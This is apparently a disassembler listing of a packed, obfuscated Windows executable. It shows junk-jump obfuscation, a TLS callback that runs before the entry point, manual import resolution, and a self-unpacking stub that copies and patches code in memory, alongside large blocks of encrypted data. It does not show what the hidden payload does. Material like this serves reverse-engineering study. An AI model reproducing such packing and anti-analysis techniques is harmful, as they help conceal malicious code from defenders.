sub_48E9EE	proc near		; CODE XREF: sub_48AEB5:loc_4899FAp

; FUNCTION CHUNK AT 0048A1B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AC9C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0048BBD1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E9B8 SIZE 0000002A BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	byte ptr [eax],	0Fh
		pop	eax
		mov	large fs:0, esp
		mov	eax, large fs:20h
		or	eax, eax
		jmp	loc_48BBD1
sub_48E9EE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_48EA0B:				; CODE XREF: eu81y7qg:0048B4E5j
		jle	loc_48D779
		ror	ebp, 16h

; =============== S U B	R O U T	I N E =======================================



sub_48EA14	proc near		; CODE XREF: sub_48DE75-135Ap

; FUNCTION CHUNK AT 0048996E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00489C0F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048EE87 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [ebp-4]
		mov	al, [eax]
		sub	al, 99h
		jmp	loc_48996E
sub_48EA14	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jge	loc_48DEE2
; START	OF FUNCTION CHUNK FOR sub_48BD75

loc_48EA2A:				; CODE XREF: sub_48BD75:loc_48A359j
		call	sub_48BB00

loc_48EA2F:				; CODE XREF: sub_48BB00+Bj
		add	cl, ch
		stc
		sar	edi, 0FFh
		jmp	loc_48E5FD
; END OF FUNCTION CHUNK	FOR sub_48BD75
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_577. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48EA3D:				; CODE XREF: eu81y7qg:00489998j
		jmp	loc_48A56A
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48EA43:				; DATA XREF: sub_48A0B7:loc_48C536o
		mov	ebp, esp
		push	offset sub_48A51F
		jmp	loc_48C418
; ---------------------------------------------------------------------------

loc_48EA4F:				; CODE XREF: eu81y7qg:0048BE38j
		jl	near ptr dword_48B6BC+16h
; START	OF FUNCTION CHUNK FOR sub_48D676

loc_48EA55:				; CODE XREF: sub_48D676+Fj
		jmp	nullsub_597
; END OF FUNCTION CHUNK	FOR sub_48D676
; ---------------------------------------------------------------------------
		dw 0F00h
		dd 0FFF1598Ah, 1FC0C1FFh, 0D64663BEh, 0CC5CE9EBh, 90E8FFFFh
		dd 0FFFFD8h, 0DBFCE900h, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AEB5

loc_48EA7C:				; CODE XREF: sub_48AEB5+2D1j
		xor	eax, 7538D742h
		or	eax, 0BB9700FFh
		jnz	loc_489851
; END OF FUNCTION CHUNK	FOR sub_48AEB5
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------

loc_48EA90:				; CODE XREF: eu81y7qg:0048B043j
		jmp	near ptr dword_48979C+12h
; ---------------------------------------------------------------------------
		jmp	loc_48B35A
; ---------------------------------------------------------------------------
		align 4
		test	eax, esi
		jmp	loc_489849
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		dd 1E176856h, 0E95E1801h, 0FFFFE3F6h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48AEB5

loc_48EAB2:				; CODE XREF: sub_48AEB5+2D95j
		jmp	nullsub_560
; END OF FUNCTION CHUNK	FOR sub_48AEB5
; ---------------------------------------------------------------------------
		align 4
		jmp	loc_48DC33
; ---------------------------------------------------------------------------
		mov	ebx, [eax]
		jno	loc_48A9BC
		jmp	sub_48EB80
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A315

loc_48EACB:				; CODE XREF: sub_48A315:loc_48A64Aj
		jz	loc_48C45E
; END OF FUNCTION CHUNK	FOR sub_48A315
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C1h
		dd 0F08719E8h, 0AED5C181h, 7BE951BEh, 0FFFFD9h,	0B90EE9C3h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48EAEA:				; CODE XREF: eu81y7qg:0048C013j
		jnb	loc_48AA27
		cmp	ecx, 33C26A32h
		jmp	loc_489868
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		db 0C1h, 0C7h, 12h
		dd 5B241C87h, 0B072689Ch, 0C1580362h, 0C08102C0h, 0F2BDF2B4h
		dd 0FFCE58E9h, 0CB0B00FFh, 0FFD49AE9h
		db 0FFh, 2 dup(0)
byte_48EB23	db 0FFh			; DATA XREF: eu81y7qg:0048AC11o
		dd 8B550C75h, 242C87EBh, 45E09F68h, 242C8762h, 0E95DDD8Bh
		dd 0FFFFFBF8h
		db 0
; ---------------------------------------------------------------------------

locret_48EB3D:				; CODE XREF: eu81y7qg:0048CD6Bj
		retn
; ---------------------------------------------------------------------------
		align 10h

locret_48EB40:				; CODE XREF: eu81y7qg:0048C404j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BE6F

loc_48EB43:				; CODE XREF: sub_48BE6F+Cj
		jmp	loc_48C74B
; END OF FUNCTION CHUNK	FOR sub_48BE6F
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48EB49:				; CODE XREF: eu81y7qg:0048AB36j
		jmp	loc_48A3D5
; ---------------------------------------------------------------------------
		align 10h
		dd 87FA8B57h, 46E9243Ch, 0C3FFFFB4h, 0CCD6E800h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48EB63:				; CODE XREF: sub_48DE75-34F2j
		jmp	nullsub_580
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48EB6A:				; DATA XREF: eu81y7qg:0048EEC3o
		push	esi
		push	48A466h
		jmp	loc_48DFC4
; ---------------------------------------------------------------------------
		align 2

loc_48EB76:				; CODE XREF: sub_48DE75-1CAAp
		xchg	ebx, [esp]
		call	sub_48AB88
; ---------------------------------------------------------------------------
		dw 0

; =============== S U B	R O U T	I N E =======================================



sub_48EB80	proc near		; CODE XREF: eu81y7qg:0048D0A8p
					; eu81y7qg:0048EAC5j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004895E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C342 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	eax, [esp-4+arg_0]
		pop	eax
		jmp	loc_48C342
sub_48EB80	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 13h,	0F5h, 0E9h
		dd 0FFFFDEDDh
		db 0
; ---------------------------------------------------------------------------

loc_48EB95:				; CODE XREF: eu81y7qg:0048C953j
		xchg	edx, [esp]
		pop	edx
		push	edx
		push	48ABE7h
		jmp	near ptr dword_48A8F0+2
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CFEF

loc_48EBA6:				; CODE XREF: sub_48CFEF:loc_48E936j
		push	offset loc_48DDF0
		jmp	loc_48A7A1
; END OF FUNCTION CHUNK	FOR sub_48CFEF
; ---------------------------------------------------------------------------

loc_48EBB0:				; CODE XREF: eu81y7qg:0048AD40j
		jbe	loc_489834
		add	ebp, esi
		mov	[eax], edi

loc_48EBBA:				; CODE XREF: eu81y7qg:loc_48A56Aj
		add	edi, 0FFCB82F4h
		add	eax, edi
		jmp	loc_48E6FD
; ---------------------------------------------------------------------------
		align 4
		dd 240C8700h, 8D08F668h, 0EA815A63h, 8084FCFCh,	0B728C281h
		dd 0E281B50Dh, 7CE157C7h, 5DBCA81h, 0A0E8209Dh
		db 0E0h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48EBEF:				; CODE XREF: eu81y7qg:loc_48C773p
		xchg	esi, [esp]
		pop	esi
		push	dword ptr [ebp-4]
		call	sub_48D1E8
; ---------------------------------------------------------------------------
		db 0
		dd 880F00h, 9DFFFFBDh, 0FFD8CBE9h, 9D0000FFh, 0FFC57AE9h
		db 0FFh, 0C3h, 0

; =============== S U B	R O U T	I N E =======================================



sub_48EC13	proc near		; CODE XREF: eu81y7qg:0048A6AFj
					; eu81y7qg:loc_48AE4Bp

; FUNCTION CHUNK AT 0048A515 SIZE 0000000A BYTES

		xchg	esi, [esp+0]
		xchg	eax, [esp+0]
		mov	esi, eax
		pop	eax
		push	ecx
		mov	ecx, offset dword_48E2BC
		jmp	loc_48A515
sub_48EC13	endp

; ---------------------------------------------------------------------------
		align 4

loc_48EC28:				; DATA XREF: eu81y7qg:00489B1Ao
		add	esi, ebp
		call	sub_48C126
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48EC2F:				; CODE XREF: sub_48DE75-3ED9j
		jmp	nullsub_561
; ---------------------------------------------------------------------------

loc_48EC34:				; CODE XREF: sub_48DE75-2DF0j
		jnp	loc_48DEC0
		popf

loc_48EC3B:				; CODE XREF: sub_48DE75-3B6Fj
		or	edi, 4DD88B89h
		xor	edi, 84C0588Fh
		jmp	loc_489803
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dd 0C35D0000h
; ---------------------------------------------------------------------------

loc_48EC50:				; CODE XREF: eu81y7qg:0048C35Bj
		jmp	near ptr dword_48BF40+2
; ---------------------------------------------------------------------------

loc_48EC55:				; CODE XREF: eu81y7qg:loc_48C34Dj
		push	esi
		mov	esi, ebp
		xchg	esi, [esp]
		jmp	near ptr dword_48BC8C+16h
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48EC61:				; CODE XREF: eu81y7qg:loc_48B232j
		call	near ptr dword_48AEE0+22h
		add	cl, ch
; ---------------------------------------------------------------------------
		dd 0FFFFB59Ah
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48B258

loc_48EC6E:				; CODE XREF: sub_48B258:loc_489932j
		push	offset word_48D01A
		jmp	loc_48D8FB
; END OF FUNCTION CHUNK	FOR sub_48B258
; ---------------------------------------------------------------------------

loc_48EC78:				; CODE XREF: eu81y7qg:0048B522j
		push	ecx
		mov	ecx, offset loc_48DB00
		jmp	near ptr byte_489D09+2
; ---------------------------------------------------------------------------

loc_48EC83:				; CODE XREF: eu81y7qg:0048B1FDj
					; eu81y7qg:0048C155j
		call	near ptr dword_48AA40+1
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A548

loc_48EC8A:				; CODE XREF: sub_48A548+Dj
		or	edi, 133FFFE3h
		xor	edi, 0A97223FAh
		add	edi, 0E1C754D8h
		add	esi, edi
		pop	edi

loc_48EC9F:				; DATA XREF: eu81y7qg:0048D3CAo
		xor	eax, 0BFA4E936h
; END OF FUNCTION CHUNK	FOR sub_48A548
; ---------------------------------------------------------------------------
		dd 0FFFFh, 0D3BC850Fh, 3C87FFFFh, 2AF65F24h, 1DE9A43Ch
		dd 0FFFFE3h, 0EB860F00h, 81FFFFFAh, 8782D2h, 0FB58E9B9h
		dd 0FFFFh

; =============== S U B	R O U T	I N E =======================================



sub_48ECD0	proc near		; CODE XREF: eu81y7qg:loc_48DC95p
		xchg	ecx, [esp+0]
		pop	ecx
		push	9BB7ECADh
		xchg	edi, [esp+0]
		jmp	loc_48E2E5
sub_48ECD0	endp

; ---------------------------------------------------------------------------
		db 0C1h, 0C6h, 0Ch
		dd 0F525F681h, 0C60387E8h
		db 5Eh
byte_48ECED	db 8Bh,	0, 0E8h		; DATA XREF: sub_48DE75+FFo
		dd 0FFFFE918h, 0B854890Fh, 7BE9FFFFh
		db 0D5h, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_556. PRESS KEYPAD	"+" TO EXPAND]
		db 0
; ---------------------------------------------------------------------------

loc_48ED01:				; CODE XREF: eu81y7qg:00489CADj
		jmp	loc_48B118
; ---------------------------------------------------------------------------
		align 4

locret_48ED08:				; CODE XREF: eu81y7qg:0048C14Cj
		retn
; ---------------------------------------------------------------------------
		align 2
		adc	ebx, 7DA41D68h

; =============== S U B	R O U T	I N E =======================================



sub_48ED10	proc near		; CODE XREF: eu81y7qg:loc_48AE62p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00489DFD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048A0DA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048A6C0 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0048CF78 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	ecx
		mov	ecx, ebx
		xchg	ecx, [esp+0]
		jmp	loc_489DFD
sub_48ED10	endp

; ---------------------------------------------------------------------------
		db 8Bh
		dd 0D4D1E9EFh, 0FFFFh, 598B01C6h, 7767C981h, 0C18180C9h
		dd 51200E5h, 0FFAE6FE8h, 0F01C6FFh, 8B243C87h, 0C1855FCFh
		dd 8B241C87h, 87E95BCBh, 0C1FFFFD8h, 34E916C9h
		db 0DFh, 2 dup(0FFh)

; =============== S U B	R O U T	I N E =======================================



sub_48ED5B	proc near		; CODE XREF: eu81y7qg:0048B1BAp
		xchg	ebx, [esp+0]
		xchg	edi, [esp+0]
		mov	ebx, edi
		push	489759h
		jmp	near ptr dword_48AEB0+2
sub_48ED5B	endp

; ---------------------------------------------------------------------------
		align 2
		dw 870Fh
		dd 0FFFFBE4Fh, 0E914C6C1h, 0FFFFEB1Ah, 21850F00h, 81FFFFEEh
		dd 169FE6C1h, 0E198E929h, 850FFFFFh, 0FFFFD409h, 59240C87h
		dd 0AEA0D368h, 0C8815825h, 816B97E6h, 0E906C0C1h, 0FFFFCCFBh
		dd 0C281CB33h, 996BB035h, 0FFCE0FE9h
		db 0FFh, 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48EDBB	proc near		; CODE XREF: eu81y7qg:00489DF8p
		xchg	esi, [esp+0]
		pop	esi
		push	eax
		push	offset loc_48C037
		jmp	near ptr dword_4899DC+0Ch
sub_48EDBB	endp

; ---------------------------------------------------------------------------
		dw 0F00h
		dd 0FFCA7A87h, 0C6FA81FFh, 0E91DEFFAh, 0FFFFA8BBh, 8B5A0000h
		dd 0B0E89C00h, 0FFFFEBh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_605. PRESS KEYPAD	"+" TO EXPAND]
		align 2

loc_48EDEA:				; CODE XREF: eu81y7qg:0048A2C7j
		jnz	loc_48C783
		jmp	loc_48E8C6
; ---------------------------------------------------------------------------
		align 2
		dw 0CDC1h
		dd 0AD40E909h, 0FFFFh, 0DCF4E99Dh, 0FFFFh
; ---------------------------------------------------------------------------

loc_48EE08:				; CODE XREF: eu81y7qg:0048C9CEj
		xchg	ecx, [esp]

loc_48EE0B:				; CODE XREF: eu81y7qg:0048B238j
		pop	ecx
		mov	edx, [eax]
		push	offset loc_48B66C
		jmp	near ptr dword_48AAB0+7
; ---------------------------------------------------------------------------
		dd 4EE99C00h
		db 0D0h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48EE1F:				; CODE XREF: eu81y7qg:0048C948j
		mov	eax, offset loc_48D0C6
		jmp	loc_48D0C0
; ---------------------------------------------------------------------------
		db 87h,	3Ch, 24h
		dd 0E85FCF8Bh, 0FFFFEF5Bh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E917

loc_48EE34:				; CODE XREF: sub_48E917-35C2j
		jmp	loc_48CE2C
; END OF FUNCTION CHUNK	FOR sub_48E917
; ---------------------------------------------------------------------------
		db 2 dup(0), 33h
		dd 0A889E9DFh, 0F081FFFFh, 69EBAB1Bh, 48C4EC68h, 0D083E900h
		dd 0FFFFh, 0C25DCD8Bh, 0E900000Ch, 0FFFFFC9Ch
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_555. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	eax, offset nullsub_555
		push	offset loc_48C018
		jmp	loc_48CD97
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48EE72:				; CODE XREF: sub_48DE75:loc_48E530j
		add	ecx, ebp
		add	ecx, 64637CCCh
		call	near ptr dword_489508+0Fh
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
		dd 0BEF3E900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48EA14

loc_48EE87:				; CODE XREF: sub_48EA14-508Dj
		jmp	loc_489C0F
; END OF FUNCTION CHUNK	FOR sub_48EA14
; ---------------------------------------------------------------------------

loc_48EE8C:				; CODE XREF: eu81y7qg:0048D694j
		jnp	loc_48E1E1

loc_48EE92:				; CODE XREF: eu81y7qg:0048B67Fj
		and	ebx, 0BB43F864h
		rol	ebx, 1Ah
		add	ebx, 6D9EF523h
		call	sub_48CEBF
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------

loc_48EEA8:				; CODE XREF: eu81y7qg:0048C049j
		jmp	near ptr byte_48ABCD+2
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48EEAF:				; CODE XREF: eu81y7qg:0048B199j
		jmp	loc_48B870
; ---------------------------------------------------------------------------
		dd 1DE90000h, 0FFFFCCh
		db 0
; ---------------------------------------------------------------------------

loc_48EEBD:				; CODE XREF: eu81y7qg:0048BEAFj
		xor	eax, 643FCFE2h
		push	offset loc_48EB6A
		jmp	near ptr dword_48A3F0+17h
; ---------------------------------------------------------------------------
		align 2

loc_48EECE:				; CODE XREF: sub_4897EC+12j
		push	ebx
		pushf
		call	sub_48E7D7
		add	cl, ch
		stosb
; ---------------------------------------------------------------------------
		dd 0FFFFDDh, 505AC28Bh,	487C18Bh, 0A916B924h, 0E7E90048h
		db 0E5h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		push	esi
		push	edi
		push	ebx
		mov	esi, offset dword_438000
		mov	eax, 400000h
		mov	[ebp-4], eax
		mov	edx, eax

loc_48EF07:				; CODE XREF: eu81y7qg:0048F04Aj
		mov	eax, [esi+0Ch]
		or	eax, eax
		jz	loc_48EFA0
		add	eax, edx
		mov	ebx, eax
		push	eax
		call	ds:dword_45C0B4	; GetModuleHandleA
		or	eax, eax
		jnz	loc_48EF34
		push	ebx
		call	ds:dword_45C0B8	; LoadLibraryA
		or	eax, eax
		jz	loc_48EF98

loc_48EF34:				; CODE XREF: eu81y7qg:0048EF1Fj
		mov	[ebp-8], eax
		push	0
		pop	dword ptr [ebp-0Ch]

loc_48EF3C:				; CODE XREF: eu81y7qg:0048EF91j
		mov	eax, [esi]
		or	eax, eax
		mov	edx, [ebp-4]
		jnz	loc_48EF4C
		mov	eax, [esi+10h]

loc_48EF4C:				; CODE XREF: eu81y7qg:0048EF43j
		add	eax, edx
		add	eax, [ebp-0Ch]
		mov	ebx, [eax]
		mov	edi, [esi+10h]
		add	edi, edx
		add	edi, [ebp-0Ch]
		or	ebx, ebx
		jz	loc_48F044
		test	ebx, 80000000h
		jnz	loc_48EF73
		lea	ebx, [ebx+edx+2]

loc_48EF73:				; CODE XREF: eu81y7qg:0048EF69j
		and	ebx, 7FFFFFFFh
		push	ebx
		push	dword ptr [ebp-8]
		call	ds:dword_45C0BC	; GetProcAddress
		or	eax, eax
		jz	loc_48EF98
		mov	[edi], eax
		add	dword ptr [ebp-0Ch], 4
		jmp	loc_48EF3C
; ---------------------------------------------------------------------------
		align 4

loc_48EF98:				; CODE XREF: eu81y7qg:0048EF2Ej
					; eu81y7qg:0048EF85j
		push	ebx
		mov	eax, ebx
		call	sub_48EFA8

loc_48EFA0:				; CODE XREF: eu81y7qg:0048EF0Cj
		pop	ebx
		pop	edi
		pop	esi
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_48EFA8	proc near		; CODE XREF: eu81y7qg:0048EF9Bp

var_108		= dword	ptr -108h
var_104		= dword	ptr -104h
var_100		= dword	ptr -100h
var_FC		= dword	ptr -0FCh
var_F8		= dword	ptr -0F8h

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFEF8h
		mov	[ebp+var_104], eax
		mov	[ebp+var_100], 276E6143h
		mov	[ebp+var_FC], 6F6C2074h
		mov	[ebp+var_F8], 206461h
		mov	[ebp+var_108], 0Bh

loc_48EFDF:				; CODE XREF: sub_48EFA8+97j
		mov	eax, [ebp+var_104]
		cmp	byte ptr [eax],	0
		jnz	loc_48F01E
		mov	eax, [ebp+var_108]
		mov	byte ptr [ebp+eax+var_100], 0
		push	2010h
		push	0
		lea	eax, [ebp+var_100]
		push	eax
		push	0
		call	ds:dword_45C104	; MessageBoxA
		push	0FFFFFFFFh
		call	ds:dword_45C0C0	; ExitProcess
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_48F01E:				; CODE XREF: sub_48EFA8+40j
		mov	eax, [ebp+var_108]
		mov	edx, [ebp+var_104]
		mov	dl, [edx]
		mov	byte ptr [ebp+eax+var_100], dl
		inc	[ebp+var_108]
		inc	[ebp+var_104]
		jmp	loc_48EFDF
sub_48EFA8	endp

; ---------------------------------------------------------------------------

loc_48F044:				; CODE XREF: eu81y7qg:0048EF5Dj
		add	esi, 14h
		mov	edx, [ebp-4]
		jmp	loc_48EF07
; ---------------------------------------------------------------------------
		align 10h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48F051	proc near		; CODE XREF: sub_48CF7E:loc_48C84Cp
					; TlsCallback_0p
		mov	eax, offset sub_489492

locret_48F056:				; DATA XREF: sub_48F057+8o
		retn
sub_48F051	endp


; =============== S U B	R O U T	I N E =======================================



sub_48F057	proc near		; DATA XREF: eu81y7qg:0048A870o

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h

		push	esi
		push	edi
		push	ecx
		push	ebx
		push	eax
		mov	ebx, [esp+14h+var_14]
		sub	ebx, offset locret_48F056
		mov	eax, 4782h
		push	eax
		push	4
		push	1000h
		push	eax
		push	0
		mov	eax, offset dword_45C0C4
		mov	eax, [eax+ebx]
		call	eax
		pop	ecx
		mov	edx, offset sub_489492
		add	edx, ebx
		push	edx
		push	ebx
		push	eax
		mov	edi, eax
		mov	esi, edx
		cld
		rep movsb
		mov	ecx, offset sub_48930E
		add	ecx, ebx
		call	ecx
		pop	eax
		mov	ebx, [esp+10h+var_10]
		push	8000h
		push	0
		push	eax
		mov	eax, 45C0C8h
		mov	eax, [eax+ebx]
		call	eax
		pop	ecx
		pop	eax
		pop	ebx
		sub	ebx, 5
		mov	byte ptr [ebx],	0B8h
		inc	ebx
		mov	[ebx], eax
		add	ebx, 4
		mov	byte ptr [ebx],	0C3h
		or	ecx, ecx
		jz	short loc_48F10C
		mov	ebx, eax
		call	loc_48F16D
		cld
		lodsd
		cmp	eax, 0FFFFFFFFh
		jz	short loc_48F10C
		push	ebx
		mov	ebx, ecx

loc_48F0D7:				; CODE XREF: sub_48F057+91j
					; sub_48F057+A4j ...
		add	ebx, eax
		add	[ebx], ecx
		add	ebx, 4
		lodsb
		cmp	al, 0FEh
		jnb	short loc_48F0EA
		and	eax, 0FFh
		jmp	short loc_48F0D7
; ---------------------------------------------------------------------------

loc_48F0EA:				; CODE XREF: sub_48F057+8Aj
		add	ebx, 0FEh
		or	eax, eax
		jp	short loc_48F0FD
		lodsw
		and	eax, 0FFFFh
		jmp	short loc_48F0D7
; ---------------------------------------------------------------------------

loc_48F0FD:				; CODE XREF: sub_48F057+9Bj
		lodsd
		dec	esi
		and	eax, 0FFFFFFh
		cmp	eax, 0FFFFFFh
		jnz	short loc_48F0D7
		pop	eax

loc_48F10C:				; CODE XREF: sub_48F057+6Dj
					; sub_48F057+7Bj
		pop	ebx
		pop	ecx
		pop	edi
		pop	esi
		retn
sub_48F057	endp

; ---------------------------------------------------------------------------
		db 0FDh, 75h, 0BEh
		dd 7A8D034Eh, 0E0CFF062h, 0B676B7Ch, 0B589C812h, 62A12D3Ch
		dd 8AA569CDh, 0A43F936Eh, 39DCBBDFh, 0F8F7AF74h, 0C3ED7D1Fh
		dd 217F1FDCh, 7BC3D298h, 5A431398h, 3783E0DCh, 9B1BCED9h
		dd 0C6896433h, 0FEF7E8B3h, 0CD05FFFFh, 0FF000036h
		db 0E0h

; =============== S U B	R O U T	I N E =======================================


		public TlsCallback_0

TlsCallback_0	proc near		; DATA XREF: eu81y7qg:TlsCallbackso
		call	sub_48F051
		add	eax, 5302h
		jmp	eax
TlsCallback_0	endp

; ---------------------------------------------------------------------------

loc_48F16D:				; CODE XREF: sub_48F057+71p
		call	sub_48F176
; ---------------------------------------------------------------------------
		dw 0FFFFh
		db 2 dup(0FFh)

; =============== S U B	R O U T	I N E =======================================



sub_48F176	proc near		; CODE XREF: eu81y7qg:loc_48F16Dp
		pop	esi
		retn
sub_48F176	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0C12CF000h, 0CAD8E4EAh, 0DBCD0E5Ah, 150B7A27h, 7614624Dh
		dd 7DAB43D3h, 9E19242Ah, 22CDE0FEh, 785CEC23h, 2179EC4Fh
		dd 0DC6EAE84h, 0E8BDCA68h, 213B6949h, 152432F3h, 53FA69Fh
		dd 0EA349710h, 83423B96h, 0A3FFC0A1h, 613D806Ah, 0E2F02592h
		dd 8640D588h, 11A9F8h, 0D55105D0h, 457D406h, 0ED3EAD2Ch
		dd 0A414F73Bh, 1934F2AFh, 5C45930Fh, 0A36E9031h, 6FB4426h
		dd 1FFB9BBh, 0AAE97C6Dh, 5DB39042h, 231C7B2Ch, 380h dup(0)
eu81y7qg	ends

; Section 8. (virtual address 00090000)
; Virtual size			: 00007000 (  28672.)
; Section size in file		: 00007000 (  28672.)
; Offset to raw	data for section: 00090000
; Flags	E00000E0: Text Data Bss	Executable Readable Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
zbox2z3f	segment	para public 'CODE' use32
		assume cs:zbox2z3f
		;org 490000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
		dd 384D7707h, 0A0E71295h, 0DF3FBB3h, 1395D0DBh,	17C2F390h
		dd 6038B926h, 0D586C0D5h, 0E773CD93h, 864193FDh, 4C16A5B1h
		dd 0E51E8395h, 2E3F1354h, 47ECFE7Eh, 59F0D518h,	6F4D552h
		dd 5B311373h, 9FDD4B6Eh, 6DF6D6A5h, 0E4DC9B7h, 8F37F47h
		dd 41C5B7DCh, 39D2824Ch, 0E68ED6DFh
dword_49005C	dd 132BC7ACh, 0B01416A5h, 1302CC78h, 4708893Eh,	0AC80F49Ah
					; DATA XREF: _1fieagrn:0041EFB8o
					; _1fieagrn:0041EFD4o
		dd 0C59D116Fh, 0A20AABBCh, 5A272058h, 0B9C6BC5Ah, 6A8DE6E8h
		dd 0D8AFCAF1h, 0A38E8593h, 12BA2E74h, 68D7B9BCh, 0F6C1CFCAh
		dd 0F1411167h, 0CBB5714Ah, 0C98463C6h, 0A123ED1Eh, 6EAA6503h
		dd 0EED7523Fh, 0DEE3E808h, 3A414895h, 0F48D61FDh, 479B1531h
		dd 0BE51E8E9h, 24AF1210h, 3CEC96E0h, 91CD990Ah,	0C9266F6Eh
		dd 0AF5C1CFCh, 87114C29h, 157FB2BDh, 0A7EC4DDBh, 97366FF8h
		dd 0F2812B4Dh, 21B579CAh, 3681615Ah, 3EF8DBDEh,	275FF8FDh
		dd 161EB6BDh, 1EA6D2DFh, 192693Ch, 7BED50EFh, 0B831931Eh
		dd 0E2943AB2h, 0F0C5FABh, 84834A56h, 0F988A9Eh,	9CE55FFAh
		dd 1A0FC5Bh, 6AD13E34h,	377316A4h, 0D69FA9C8h, 0D05E8964h
		dd 0A7EFA8AFh, 83FA51C9h, 6411076Ah, 5173503Fh,	89CA1317h
		dd 0F6514F06h, 48B9DD6h, 8A2882DAh, 4B988FCh, 3C37A1FEh
		dd 0CDB23A23h, 0E5C36598h, 5EAA3DDh, 94FD4B35h,	0D0BEF506h
		dd 0ADD8DA90h, 7A789DF6h, 5892D814h, 4349790h, 0A592C21Ah
		dd 0A81FF973h, 8C6D29EBh, 65252FF5h, 59D73482h,	9A751B90h
		dd 0E72527B1h, 0EF7CA838h, 0B42A6870h, 177B367Fh, 0DBD88167h
		dd 0A9E83BA8h, 78822908h, 0A3D511F9h, 0CEB16D1Ah, 0AB7EB0D3h
		dd 7ECDDEF6h, 81F5E092h, 0CDCDF288h, 4818AB1Fh,	742E88AAh
		dd 705D803Bh, 231A7859h, 0ABB75C42h, 7E3A6B4Eh,	0A4D30FE2h
		dd 0D8282CFBh, 0B9ADBE6h, 0E9E656E8h, 0E8F443D5h, 47B59FD0h
		dd 49657943h, 640976BAh, 1650A9B6h, 0ACCBA3EBh,	9A2B0311h
		dd 79A10F35h, 52370F80h, 6BC67982h, 6051F2ECh, 15954D5Bh
		dd 519DA2E3h, 0A211CBA9h, 62A4A8F4h, 0DA67EB8Ah, 0FAB8A5A5h
		dd 8ACF3A46h, 0EA3110C3h, 0A83FE65Ah, 0B3B557AFh, 4C3C273Ch
